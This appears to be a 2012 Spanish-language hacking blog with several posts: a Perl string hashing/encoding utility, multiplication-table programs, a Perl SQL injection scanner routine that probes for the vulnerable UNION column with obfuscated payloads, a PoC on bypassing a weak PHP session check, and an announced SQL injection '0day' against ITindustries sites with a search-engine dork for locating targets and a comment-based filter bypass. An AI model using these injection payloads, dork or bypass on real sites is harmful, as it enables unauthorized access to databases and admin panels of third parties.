domingo, 13 de mayo de 2012

Simple String Converter v1.2

#Este Source Sirve para encriptar un String en distintas formas
#ASCCI, HEX, Hex_url, MD5, SHA1
#Modo de uso: perl script.pl palabra_a_encriptar
#!/usr/bin/perl

use Digest::MD5  qw(md5_hex md5_base64);
use Digest::SHA1  qw(sha1_hex sha1_base64);

my $str = $ARGV[0];

#String to ASCCI

@array_ascci = split (//,$str);

foreach $i (@array_ascci) 
{ $ascci = $ascci . ord($i) . ","; }

chop ($ascci); print "ASCCI:\t\t$ascci\n";

#String to HEX
print "HEX:\t\t0x";
print unpack('H*', "$str");
print "\n";

#String to Hex URL
print "HEX_URL:\t";
@array_hex = split (//,$str);
foreach $i (@array_hex) 
{ $hex_url = $hex_url . unpack('H*', "$i") . "%"; ; }

chop ($hex_url);  print "$hex_url\n\n";

#String to MD5
my $md5 = Digest::MD5->new();
$md5 = md5_hex($str);
print "MD5:\t\t$md5\n";
$md5 = md5_base64($str);
print "MD5_Base64:\t$md5\n\n";

#String to SHA1
my $sha1 = Digest::SHA1->new();
$sha1 = sha1_hex($str);
print "SHA1:\t\t$sha1\n";
$sha1 = sha1_base64($str);
print "SHA1_Base64:\t$sha1\n";



Modo de uso

miércoles, 28 de marzo de 2012

SQli Inject Union [Search] PoC

Un metodo mas eficaz encontrar la columna vulnerable con una sola búsqueda...
es un "PoC" de mi propia SQli Scanner espero que les sea de utilidad ^^!

sub sql_scann {
 

      #############################################
      #     SQL union select (Boolean)
      #    
      #     $columns_count = "30";
      #  $end = "+--+";
      #  $un = "/**/";
      #  $num_url = "5";

      print "\n[*] Escaneando Path...\n"; $table_schema;

      $union = $un ."and" . $un . "1=0" . $un . "UniOn" . $un . "SeLect" . $un;

      $i=1; while ($i<=$columns_count)
 {
   if ($i eq 1) {$cont1.= $i} else {$cont1.=',' . $i} $hex = "99999" . $i ."99999";
   if ($i eq 1) {$cont2.="concat(0x62346e7a306b,$hex)";} 
   else {$cont2.=',' . "concat(0x62346e7a306b,$hex)";}
   $path = $url . $num_url . $union . $cont2;
      my $request = $browser->get($path . $end);
      my $content = $request->content;
  
  if ($content =~ m/b4nz0k99999(\d+)99999/)
  {   print "[*] Web Vulnerada en la Columna [$1]\n[*] CoLumna en el Numero [" . $i . "]\n";
      $vulnerado = "Si"; $num_columns = $i;  $inject_columns = $1;
      last;
  } $i++; 
 } # print "$cont1\n";
   }

sábado, 25 de febrero de 2012

Errores de Comprobacion [Bypass] PoC

Bueno gente, hace rato que no publico por falta de tiempo o hueva, pero hoy les tengo un pequeño PoC muy util a lo que son algunos de los errores de comprobación que están en nuestro alcance para cambiar el flujo del programa.

Partimos con un simple login

y tenemos como PoC un simple form


Ingrese sus datos para Iniciar Sesión Nombre de Usuario Contraseña:
Bien, Ahora revisemos algunos detalles del archivo "comprueba.php".

session_start();
if($array["password_usuario"]==md5($pass) ){
/* Comprobamos que el password encriptado en la BD coincide con el password que nos han dado al encriptarlo. Recuerda usar la misma semilla para encriptar los dos passwords. */
$SESSION["login"]=$login;
$SESSION["id"]=$array["id"];
session_register("SESSION");
header("location:formulario.php");
} else {
echo "
Password Incorrecto
"; } ?>

Crea las sessiones y redirecciona al archivo "formulario.php" que lógicamente devera ser al panel de administracion


session_start();
if(!isset($SESSION)){
header("location: admin.html");
} else {
echo "Welcome $user";
}

bien, es un login facilmente de bypassear porque solo nos pide si "X" variable existe



Recuerden, es solo el PoC, con otro tipo de archivos se hacen varias cosas controlando el flujo y accediendo ala función de "X".

Espero les haya servido este peque tuto ^^

Salu2...

domingo, 22 de enero de 2012

Calculadoras para multiplicar

no tenia nada que hacer, encerio, y me puse hacer calculadoras en varios idiomas....

$a = $argv[1];

/* 
 * Ejecucion : 
 * 
 * php calculadora.php 5
 * 
 *  */
$a = $argv[1];
for ($i=1; $i<=10; $i++)
{
 echo $a," x ", $i, " = ", $a*$i, "\n";
}


//      JavaScript     

var a,b=1;
a = prompt('Numero??','');
while (b <= 10) {
 document.write(a+' x '+b+' = '+ a*b+'
');
 b++;
}


#!/usr/bib/perl
$a = $ARGV[0] ;

for ($b=1; $b<=10; $b++)  {

 print "$b x $a\t=\t",$b*$a,"\n";

}

#!/usr/bin/python
import sys
b = sys.argv[1]

for a in range(1,11):

 print a," x ",b," = ",(int(a) * int(b))
 

#include 
#include 
main()
{
int a,b;
printf("Dame la tabla: ");
scanf("%d", &a);
for (b=1; b<=10; b++)
 {
  printf("%i x %i = %d\n",a,b,a*b);
 }
}

sábado, 7 de enero de 2012

[Webapps] - ITindustries [SQLi inject Vulnerability] [Bypassing]

hace rato que no posteo un 0day así que decidí compartir el ultimo que saque porque ando
feliz!! :DDD!!!


 ; Distribuidor : ITindustries

; Path: id=x/*![explotación-bypass]*/

;Dork: intext:"by ITindustries.com" inurl:"id=*"

; Author: b4nz0k



; Nota: Este 0day fue necesario un pequeño bypass



Al parecer nos bota con una injeccion comun "&&", y lo bypasseamos con /*!*/



No se guíen por las t00ls.

Salu2...